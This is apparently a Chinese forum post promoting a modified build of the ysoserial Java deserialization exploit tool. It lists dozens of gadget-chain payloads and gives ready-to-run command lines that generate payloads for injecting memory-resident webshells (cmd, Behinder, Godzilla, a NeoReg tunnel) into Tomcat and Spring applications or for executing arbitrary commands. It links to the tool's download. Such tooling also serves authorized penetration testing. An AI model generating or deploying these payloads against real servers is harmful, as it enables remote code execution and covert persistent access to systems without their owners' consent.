反序列化利用 ysoserial Y4er 修改版

月师傅

反序列化利用 ysoserial Y4er修改版
ysoserial修改版，着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
使用方法

1. $  java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
   
2. Y SO SERIAL?
   
3. Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
   
4.   Available payload types:
   
5. 一月 11, 2024 10:44:47 上午 org.reflections.Reflections scan
   
6. 信息: Reflections took 96 ms to scan 1 urls, producing 22 keys and 208 values
   
7.      Payload                                Authors                                Dependencies
   
8.      -------                                -------                                ------------
   
9.      AspectJWeaver                          @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
   
10.      BeanShell1                             @pwntester, @cschneider4711            bsh:2.0b5
    
11.      C3P0                                   @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
    
12.      Ceylon                                 @kai_ullrich                           ceylon.language:1.3.3
    
13.      Click1                                 @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0
    
14.      Clojure                                @JackOfMostTrades                      clojure:1.8.0
    
15.      CommonsBeanutils1                      @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
    
16.      CommonsBeanutils183NOCC                @Y4er                                  commons-beanutils:1.8.3
    
17.      CommonsBeanutils192NOCC                @Y4er                                  commons-beanutils:1.9.2
    
18.      CommonsBeanutils192WithDualTreeBidiMap @Y4er                                  commons-beanutils:1.9.2, commons-collections:3.1
    
19.      CommonsCollections1                    @frohoff                               commons-collections:3.1
    
20.      CommonsCollections12                   @Y4er                                  commons-collections:3.1
    
21.      CommonsCollections2                    @frohoff                               commons-collections4:4.0
    
22.      CommonsCollections3                    @frohoff                               commons-collections:3.1
    
23.      CommonsCollections4                    @frohoff                               commons-collections4:4.0
    
24.      CommonsCollections5                    @matthias_kaiser, @jasinner            commons-collections:3.1
    
25.      CommonsCollections6                    @matthias_kaiser                       commons-collections:3.1
    
26.      CommonsCollections7                    @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
    
27.      CommonsCollections8                    @navalorenzo                           commons-collections4:4.0
    
28.      Fastjson1                              @Y4er                                  fastjson:1.2.83
    
29.      Fastjson2                              @Y4er                                  fastjson:2.x
    
30.      FileUpload1                            @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
    
31.      Groovy1                                @frohoff                               groovy:2.3.9
    
32.      Hibernate1                             @mbechler
    
33.      Hibernate2                             @mbechler
    
34.      JBossInterceptors1                     @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
    
35.      JRMPClient                             @mbechler
    
36.      JRMPListener                           @mbechler
    
37.      JSON1                                  @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
    
38.      Jackson1                               @Y4er                                  jackson-databind:2.14.2
    
39.      Jackson2                               @Y4er                                  jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE
    
40.      JavassistWeld1                         @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
    
41.      Jdk7u21                                @frohoff
    
42.      Jython1                                @pwntester, @cschneider4711            jython-standalone:2.5.2
    
43.      Jython2                                @steven_seeley, @rocco_calvi           jython-standalone:2.7.3
    
44.      MozillaRhino1                          @matthias_kaiser                       js:1.7R2
    
45.      MozillaRhino2                          @_tint0                                js:1.7R2
    
46.      Myfaces1                               @mbechler
    
47.      Myfaces2                               @mbechler
    
48.      ROME                                   @mbechler                              rome:1.0
    
49.      Spring1                                @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
    
50.      Spring2                                @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
    
51.      URLDNS                                 @gebl
    
52.      Vaadin1                                @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
    
53.      Wicket1                                @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

复制代码

内存马相关
以CommonsBeanutils192NOCC为例：

1. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"                     # TomcatCmdEcho
   
2. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromJMX"      # TomcatServletMemShellFromJMX
   
3. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatServletMemShellFromThread"   # TomcatServletMemShellFromThread
   
4. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromJMX"       # TomcatFilterMemShellFromJMX     适用于tomcat7-9
   
5. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatFilterMemShellFromThread"    # TomcatFilterMemShellFromThread  适用于tomcat7-9
   
6. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromJMX"     # TomcatListenerMemShellFromJMX
   
7. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerMemShellFromThread"  # TomcatListenerMemShellFromThread
   
8. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:TomcatListenerNeoRegFromThread"    # TomcatListenerNeoRegFromThread     python neoreg.py -k fuckyou
   
9. java -jar ysoserial.jar CommonsBeanutils192NOCC "CLASS:SpringInterceptorMemShell"         # SpringInterceptorMemShell       链接shell需要使用存在的路由
   
10. java -jar ysoserial.jar CommonsBeanutils192NOCC "FILE:E:\Calc.class"                      # ClassLoaderTemplate
    
11. java -jar ysoserial.jar CommonsBeanutils192NOCC "calc"                                    # CommandTemplate                 CLASS: FILE: 不使用协议开头则默认为执行cmd

复制代码

一键注入cmdshell、冰蝎、哥斯拉内存马，shell连接使用请查看指定类。解决了request和response包装类导致冰蝎链接失败的问题，见issue。

以下受到Gadgets.createTemplatesImpl影响的gadget均需要如上方式传递参数：

1. 以下受到Gadgets.createTemplatesImpl影响的gadget均需要如上方式传递参数：
   
2. 
   
3. Click1
   
4. CommonsBeanutils1
   
5. CommonsBeanutils183NOCC
   
6. CommonsBeanutils192NOCC
   
7. CommonsCollections2
   
8. CommonsCollections3
   
9. CommonsCollections4
   
10. Hibernate1
    
11. JavassistWeld1
    
12. JBossInterceptors1
    
13. Jdk7u21
    
14. JSON1
    
15. MozillaRhino1
    
16. MozillaRhino2
    
17. ROME
    
18. Spring1
    
19. Spring2
    
20. Vaadin1

复制代码

项目地址 https://github.com/Y4er/ysoserial
下载地址 https://github.com/Y4er/ysoseria ... .6-SNAPSHOT-all.jar